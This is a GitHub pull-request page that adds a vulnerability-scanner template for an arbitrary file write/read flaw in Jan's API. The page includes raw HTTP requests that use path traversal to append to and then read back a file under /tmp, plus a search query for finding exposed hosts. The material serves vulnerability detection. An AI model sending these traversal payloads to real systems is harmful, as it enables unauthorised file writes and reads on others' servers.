Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Create jan-api-lfi.yaml #10327

Merged
merged 3 commits into from
Jul 23, 2024
Merged

Create jan-api-lfi.yaml #10327

merged 3 commits into from
Jul 23, 2024

Conversation

pussycat0x
Copy link
Contributor

Template / PR Information

  • Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
  • References:

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@pussycat0x pussycat0x added the Done Ready to merge label Jul 18, 2024
@savushkin-yauheni
Copy link
Contributor

Hi. I think we should split randstr to randstr_1 and randstr_2, otherwise it produces a lot of false positives.

id: jan-api-lfi

info:
  name: Jan's API interface writeFileSync & appendFileSync - Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
  reference:
    - https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
    - https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
  metadata:
    fofa-query: icon_hash="-165268926"
    max-request: 2
  tags: jan,lfi
variables:

http:
  - raw:
      - |
        POST /v1/app/appendFileSync HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Referer: {{RootURL}}
        contentType: application/json
        Origin: {{RootURL}}

        ["/../../../../../tmp/{{randstr_1}}.txt","{{randstr_2}}"]
      - |
        POST /v1/app/readFileSync HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Referer: {{RootURL}}
        contentType: application/json
        Content-Type: text/plain;charset=UTF-8
        Origin: {{RootURL}}

        ["file:/../../../../../tmp/{{randstr_1}}.txt","utf-8"]

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{randstr_2}}'

      - type: status
        status:
          - 200

@ritikchaddha ritikchaddha merged commit 5648a15 into main Jul 23, 2024
2 checks passed
@ritikchaddha ritikchaddha deleted the pussycat0x-patch-9 branch July 23, 2024 07:11
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@ritikchaddha ritikchaddha ritikchaddha approved these changes

Assignees

@pussycat0x pussycat0x

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@pussycat0x @savushkin-yauheni @ritikchaddha @DhiyaneshGeek